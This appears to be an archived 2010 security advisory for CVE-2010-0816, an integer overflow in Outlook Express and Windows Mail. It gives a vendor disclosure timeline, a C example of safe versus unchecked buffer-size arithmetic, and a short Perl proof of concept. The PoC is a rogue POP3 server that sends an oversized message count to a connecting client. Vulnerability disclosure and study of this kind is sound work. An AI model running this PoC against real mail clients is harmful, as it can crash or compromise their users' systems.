
Microsoft Windows Outlook Express And Windows Mail Integer Overflow
Posted May 12, 2010
Authored by Francis Provencher

Microsoft Windows Outlook Express and Windows Mail suffer from an integer overflow vulnerability.

tags | exploit, overflow
systems | windows
advisories | CVE-2010-0816
SHA-256 | 2acf22676b2db8c146ec43270d2c5a5e9f0d7b238abc38f7dbe2d45a0204f152



#####################################################################################

Application: Microsoft Outlook Express
Microsoft Windows Mail

Platforms: Windows 2000
Windows XP
Windows Vista
Windows Server 2003
Windows Server 2008 SR2

Exploitation: Remote Exploitable

CVE Number: CVE-2010-0816

Discover Date: 2009-09-11

Author: Francis Provencher (Protek Research Lab's)

Website: http://www.protekresearchlab.com


#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) Products affected
5) The Code


#####################################################################################

=================
1) Introduction
=================

Windows Mail is an e-mail and newsgroup client included in Windows Vista, that was superseded by Windows Live Mail.
It is the successor to Outlook Express. Microsoft previewed Windows Mail on Channel 9 on October 10, 2005.[1]

Unlike Outlook Express, Windows Mail is not considered to be a component of Internet Explorer. As such, it will not
be made available for earlier Windows operating systems, while Windows Internet Explorer 7 was made available for
Windows XP.

Windows Mail has been succeeded by Windows Live Mail, which was built by the same development team as Windows Mail
and also serves as the replacement for Outlook Express for Windows XP.

(Wikipedia)

#####################################################################################

====================
2) Report Timeline
====================

2009-11-09 Vendor Contacted
2009-11-09 Vendor Response
2009-11-16 Vendor requests a PoC
2009-11-16 PoC is sent
2009-11-19 Vendor confirms they received the PoC
2009-11-24 Vendor confirms the vulnerability
2010-05-11 Public release of this advisory

#####################################################################################

======================
3) Technical details
======================

An unauthenticated remote code execution vulnerability exists in the way that the Windows Mail Client software
handles specially crafted mail responses. Exploitation requires no authentication: an attacker sends a specially
crafted response to a client that initiates a connection to a server under the attacker's control using the
common mail protocols.

The vulnerability is caused by a common library used by Outlook Express and Windows Mail insufficiently validating
network data before using that data to calculate the necessary size of a buffer.
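
The size-calculation flaw described above, shown beside a validated form. This is an added example, not code from the advisory or from Microsoft: RECORD_SIZE and MAX_MESSAGES are assumed values for illustration (the advisory does not state the real record size or any limit), and the count is the one in the advisory's PoC reply.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define RECORD_SIZE  12u       /* hypothetical per-message record size */
#define MAX_MESSAGES 1000000u  /* assumed policy cap on the server-supplied count */

/* Flawed pattern: 32-bit multiply on a network-supplied count, wraps modulo 2^32. */
uint32_t unchecked_size(uint32_t count) {
    return count * RECORD_SIZE;
}

/* Checked form: refuse any count whose product would not fit in 32 bits. */
int checked_size(uint32_t count, uint32_t *out) {
    if (count > UINT32_MAX / RECORD_SIZE)
        return -1;
    *out = count * RECORD_SIZE;
    return 0;
}

/* Parse "+OK <count> <octets>"; return 0 and set *count, or -1 to reject. */
int parse_stat(const char *line, uint32_t *count) {
    char *end;
    unsigned long long n;

    if (strncmp(line, "+OK ", 4) != 0)
        return -1;
    if (line[4] < '0' || line[4] > '9')   /* strtoull alone would accept signs and spaces */
        return -1;
    errno = 0;
    n = strtoull(line + 4, &end, 10);
    if (errno == ERANGE || *end != ' ')
        return -1;
    if (n > MAX_MESSAGES)                 /* range check before any size arithmetic */
        return -1;
    *count = (uint32_t)n;
    return 0;
}

int main(void) {
    const char *wire = "+OK 357913944 100\r\n";  /* reply text from the advisory's PoC */
    uint32_t n = 0, size = 0;

    printf("unchecked size: %u bytes\n", (unsigned)unchecked_size(357913944u));
    printf("checked_size:   %d\n", checked_size(357913944u, &size));
    printf("parse_stat:     %d\n", parse_stat(wire, &n));
    return 0;
}
```

With the assumed 12-byte record, the unchecked product for the PoC's count wraps to a few dozen bytes, while both the checked multiply and the range-limited parser reject it.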



#####################################################################################

=====================
4) Products affected
=====================

Mail client: Microsoft Outlook Express & Microsoft Windows Mail
Platforms: Vista SP1 & Windows Server 2008 SP1

#####################################################################################

=============
5) The Code
=============


#!/usr/bin/perl -w
# Found by Francis Provencher for Protek Research Lab's
# {PRL} Microsoft Windows Mail Client & Outlook Express Remote Integer Overflow
#

use IO::Socket;

$port = 110;

# Listen on the POP3 port and wait for a single client connection.
$serv = IO::Socket::INET->new(Proto     => 'tcp',
                              LocalPort => $port,
                              Listen    => 1)
    or die "Error: listen($port)\n";

$cli = $serv->accept() or die "Error: accept()\n";

# Send the greeting, then answer the client's first two commands with +OK.
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
# Answer the third command with a reply carrying a very large count.
$cli->send("+OK 357913944 100\r\n");




#####################################################################################
